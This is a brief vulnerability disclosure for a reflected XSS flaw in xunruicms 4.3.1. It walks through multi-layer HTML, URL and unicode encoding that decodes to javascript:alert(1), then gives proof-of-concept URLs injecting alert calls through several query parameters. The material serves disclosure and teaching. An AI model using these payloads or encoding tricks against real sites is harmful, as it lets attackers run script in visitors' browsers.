xunruicms 4.3.1 xss

Description

url : index.php?m=s404&uri=llfam

The url we visited can be a parameter to function dr_pc_or_mobile().

But single quote ' will be url encoded.

How to expolit ? First , we should learn how browser parser work.

ref : http://bobao.360.cn/learning/detail/292.html

Example

browser parser : html、url、javascript

html -> url -> javascript

1	<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">llfam</a>

html parser

// before
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x29; 

// after
javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)

url parser

// before
javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)

// after
javascript:\u0061\u006c\u0065\u0072\u0074(1)

javascript parser

// before
javascript:\u0061\u006c\u0065\u0072\u0074(1)

// after
javascript:alert(1)

poc

Here , The parsing order is same as the example.

url : index.php?m=s404&uri=llfam%27)%3balert(1)%3balert(%272

Vuln is in header.html , so …

1
2
3

http://cms.test/index.php?c=category&id=llfam&dir=llfam%27)%3balert(1)%3balert(%272
http://cms.test/index.php?c=show&a=llfam%27)%3balert(1)%3balert(%272
...

But , it is hard to exploit。

Contents

Description

Example

poc